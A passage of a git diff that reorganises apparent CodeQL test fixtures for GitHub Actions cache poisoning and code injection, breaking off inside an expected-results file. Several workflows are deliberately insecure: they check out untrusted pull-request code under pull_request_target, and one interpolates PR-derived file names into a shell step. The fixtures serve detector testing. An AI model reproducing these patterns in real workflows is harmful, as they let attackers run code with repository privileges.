ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml new file mode 100644 index 00000000000..9c87340d7ab --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml @@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml similarity index 54% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml index 6bfdc5b7d50..be1533f2231 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -5,27 +5,13 @@ on: push: branches: - main - - 'releases/*' jobs: - verify-build: + test: runs-on: ubuntu-latest - steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version-file: .nvmrc - - - name: Install NPM dependencies - run: npm ci - - - name: Rebuild the dist/ directory - run: npm run build - - name: Compare the expected and actual dist/ directories run: bin/check-build-output-in-dist-directory diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml deleted file mode 100644 index 6900c3bc23f..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml +++ /dev/null @@ -1,63 +0,0 @@ -# This workflow uses actions that are not certified by GitHub. -# They are provided by a third-party and are governed by -# separate terms of service, privacy policy, and support -# documentation. - -# Sample workflow for building and deploying a Jekyll site to GitHub Pages -name: Deploy Jekyll site to Pages preview environment -on: - # Runs on pull requests targeting the default branch - pull_request_target: - branches: ["main"] -# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages -permissions: - contents: read - pages: write - id-token: write -# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. -# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. -concurrency: - group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' - cancel-in-progress: false -jobs: - # Build job - build: - # Limit permissions of the GITHUB_TOKEN for untrusted code - permissions: - contents: read - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - with: - # For PRs make sure to checkout the PR branch - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages - uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll - uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 - with: - source: ./ - destination: ./_site - - name: Upload artifact - # Automatically uploads an artifact from the './_site' directory by default - uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 - # Deployment job - deploy: - environment: - name: 'Pages Preview' - url: ${{ steps.deployment.outputs.page_url }} - # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages - permissions: - contents: read - pages: write - id-token: write - runs-on: ubuntu-latest - needs: build - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 - with: - preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml deleted file mode 100644 index 5501beb9ea2..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml +++ /dev/null @@ -1,58 +0,0 @@ -name: branch-deploy - -on: - issue_comment: - types: [created] - -# Permissions needed for reacting and adding comments for IssueOps commands -permissions: - pull-requests: write - deployments: write - contents: write - checks: read - -jobs: - branch-deploy: - name: branch-deploy - if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings - ${{ github.event.issue.pull_request && - (startsWith(github.event.comment.body, '.deploy') || - startsWith(github.event.comment.body, '.noop') || - startsWith(github.event.comment.body, '.lock') || - startsWith(github.event.comment.body, '.help') || - startsWith(github.event.comment.body, '.wcid') || - startsWith(github.event.comment.body, '.unlock')) }} - runs-on: ubuntu-latest - - steps: - - name: branch-deploy - id: branch-deploy - uses: github/branch-deploy@v9 - with: - trigger: ".deploy" - environment: "production" - sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md - - # Check out the ref from the output of the IssueOps command - - uses: actions/checkout@v4 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - ref: ${{ steps.branch-deploy.outputs.ref }} - - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - bundler-cache: true - - - name: bootstrap - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - run: script/bootstrap - - # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue - - name: deploy - if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} - run: | - set -o pipefail - script/deploy | tee deploy.out - bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml deleted file mode 100644 index 4d5ae1f528c..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml +++ /dev/null @@ -1,64 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' - - deploy: - runs-on: ubuntu-latest - needs: build-and-upload - environment: - name: github-pages - url: ${{ steps.deployment.outputs.page_url }} - permissions: - pages: write - id-token: write - outputs: - deployment_url: ${{ steps.deployment.outputs.page_url }} - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@v1 - with: - preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml new file mode 100644 index 00000000000..8539bf2bda4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -0,0 +1,19 @@ +name: Publish + +on: + pull_request_target: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - run: npm run build -w www diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml new file mode 100644 index 00000000000..6e2351c1744 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./foo diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml new file mode 100644 index 00000000000..9742bd01a48 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -0,0 +1,28 @@ +name: Test +on: + pull_request_target: + branches: ["main"] + +permissions: + contents: read + pages: write + id-token: write + +jobs: + build: + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml deleted file mode 100644 index 1f0e7291442..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: Close Translation Pull Requests - -on: - pull_request_target: - branches: [ master, main, dev ] - -jobs: - - close-translation-prs: - - name: Close Translation Pull Requests - runs-on: ubuntu-latest - - steps: - - name: Get changed files - id: modified_files - uses: trilom/file-changes-action@v1.2.4 - with: - output: "," - - - name: Check the PR for translations - id: check - run: | - shopt -s nocasematch - if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then - echo "Found modified en_gb, likely a valid PR" - unset CLOSE - elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then - echo "Found modified strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then - echo "Found added strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then - echo "Found removed strings.po, unwanted." - CLOSE="true" - else - echo "No strings.po were modified or added, not a translation." - unset CLOSE - fi - echo ::set-output name=close::${CLOSE} - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml deleted file mode 100644 index a07f2922fd7..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml +++ /dev/null @@ -1,46 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml deleted file mode 100644 index 381cc16a6d1..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml +++ /dev/null @@ -1,44 +0,0 @@ -name: OpenAPI -on: - push: - branches: - - master - tags: - - 'v*' - pull_request_target: - -permissions: {} - -jobs: - - openapi-base: - name: OpenAPI - BASE - if: ${{ github.base_ref != '' }} - runs-on: ubuntu-latest - permissions: read-all - steps: - - name: Checkout repository - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 - with: - ref: ${{ github.event.pull_request.head.sha }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - fetch-depth: 0 - - name: Generate openapi.json - run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" - - publish-unstable: - name: OpenAPI - Publish Unstable Spec - if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} - runs-on: ubuntu-latest - needs: - - openapi-base - steps: - - name: Upload openapi.json (unstable) to repository server - uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 - with: - host: "${{ secrets.REPO_HOST }}" - username: "${{ secrets.REPO_USER }}" - key: "${{ secrets.REPO_KEY }}" - source: openapi-head/openapi.json - strip_components: 1 - target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml deleted file mode 100644 index fa56d074936..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ /dev/null @@ -1,23 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: {} - -jobs: - poison: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - cache: 'gradle' - cache-dependency-path: | - sub-project/*.gradle* - sub-project/**/gradle-wrapper.properties - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml deleted file mode 100644 index 03eb9e99f0f..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: - contents: read - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml deleted file mode 100644 index b7454d0a0dc..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: false - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml deleted file mode 100644 index 2fa898982bc..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: true - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml deleted file mode 100644 index be83f83cf30..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected deleted file mode 100644 index fdaf0cf25ad..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ /dev/null @@ -1,98 +0,0 @@ -edges -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | -| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | -| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | -| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | -| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | -| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | -| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | -| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | -#select -| .github/workflows/poc3.yml:33:7:38:4 